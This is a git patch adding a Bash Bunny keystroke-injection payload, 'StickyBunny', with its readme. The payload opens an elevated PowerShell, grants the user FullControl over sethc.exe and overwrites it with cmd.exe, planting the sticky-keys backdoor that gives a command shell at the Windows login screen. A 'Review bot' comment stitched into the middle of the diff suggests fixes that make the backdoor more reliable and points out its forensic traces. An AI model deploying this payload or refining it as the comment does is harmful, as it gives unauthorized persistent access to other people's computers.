From 3c2dd4ac1e07cf6e759a77abdd46b17809a0cb83 Mon Sep 17 00:00:00 2001
From: InvaderSquibs
Date: Mon, 24 Jul 2017 15:00:33 -0600
Subject: [PATCH] Added stickyBunny payload (#232)
---
 .../library/execution/StickyBunny/payload.txt | 64 +++++++++++++++++++
 .../library/execution/StickyBunny/readme.md | 21 ++++++
 2 files changed, 85 insertions(+)
 create mode 100644 payloads/library/execution/StickyBunny/payload.txt
 create mode 100644 payloads/library/execution/StickyBunny/readme.md
diff --git a/payloads/library/execution/StickyBunny/payload.txt b/payloads/library/execution/StickyBunny/payload.txt
new file mode 100644
index 00000000..8ea53f50
--- /dev/null
+++ b/payloads/library/execution/StickyBunny/payload.txt
@@ -0,0 +1,64 @@
+#!/bin/bash
+#
+# Title: StickyBunny
+# Author: Squibs
+# Version: 0.3
+# Plug2Pwn: 18s
+#
+# Creates the sticky keys back door on a windows machine
+#
+# Blue...............Preparing Attack
+# Yellow.............Attacking
+# Green..............GTFO
+#Open Admin Powershell
+ATTACKMODE HID
+LED B 200
+Q GUI
+Q DELAY 500
+Q STRING POWERSHELL
+Q DELAY 1000
+Q CTRL-SHIFT ENTER
+Q DELAY 2000
+Q LEFTARROW
+Q DELAY 100
+Q ENTER
+Q DELAY 1200
+
+#Give Permissions for sethc.exe to current user
+LED Y 500
+Q STRING "\$Acl = Get-Acl sethc.exe"
+Q ENTER
+Q DELAY 100
+Q STRING "\$Ar = New-Object system.security.accesscontrol.filesystemaccessrule(\$env:UserName,\"FullControl\",\"Allow\")"
+Q ENTER
+Q DELAY 100
+Q STRING "\$Acl.SetAccessRule(\$Ar)"
+Q ENTER
+Q DELAY 100
+Q STRING "Set-Acl sethc.exe \$Acl"
+Q ENTER
+Q DELAY 100
+
+#Copy over CMD to SETHC.EXE (Save sethc.exe as sethc.exe.bak if you want to be nice)
+Q STRING "xcopy sethc.exe sethc.exe.bak"
+Q ENTER
+Q DELAY 1200
+Q STRING "F"
+Q DELAY 100
+Q STRING "xcopy cmd.exe sethc.exe"
+Q ENTER
+Q DELAY 200
+Q STRING "Y"
+Q ENTER
+Q DELAY 200
+
+# GTFO
+Q STRING EXIT
+Q ENTER
+
+#Sync Drive
+sync
+
+#Trap is clean!
+LED G
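Review bot: The ACL and copy steps (from `Q STRING "\$Acl = Get-Acl sethc.exe"` through `Q STRING "xcopy cmd.exe sethc.exe"`) address `sethc.exe` and `cmd.exe` by relative path and never change directory, so the payload only works if the elevated PowerShell happens to start in `%SystemRoot%\System32`; add `Q STRING "cd \$env:SystemRoot\System32"` followed by `Q ENTER` before the Get-Acl line, or use `\$env:SystemRoot\System32\sethc.exe` throughout. Whether `Set-Acl` can rewrite the DACL of a TrustedInstaller-owned system binary from an elevated admin session without first taking ownership (`takeown /F sethc.exe`) is not established by the hunk and is the usual failure point of this technique, so it is worth confirming on the target build rather than relying on the `Plug2Pwn: 18s` figure. The closing `#Trap is clean!` overstates the result: the run leaves `sethc.exe.bak` beside the original and an explicit FullControl ACE naming `\$env:UserName`, both easy forensic artifacts, and the `Q DELAY` values after each step are fixed guesses with no feedback if a prompt or UAC dialog is slower than expected. The header's `Yellow` LED also disagrees with the readme's `Purple (blinking)`, and the two files carry different version numbers (0.3 vs 0.1).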
diff --git a/payloads/library/execution/StickyBunny/readme.md b/payloads/library/execution/StickyBunny/readme.md
new file mode 100644
index 00000000..ed532966
--- /dev/null
+++ b/payloads/library/execution/StickyBunny/readme.md
@@ -0,0 +1,21 @@
+# StickyBunny
+* Author: Squibs
+* Version: 0.1
+* Target: Windows
+* Time: 19s
+
+## Description
+
+Changes the sticky keys executeable to a CMD executatble allowing CMD to be opened at login page.
+
+## Configuration
+
+None.
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Blue (blinking) | Setting up |
+| Purple (blinking) | Running Attack |
+| Green (solid) | Complete |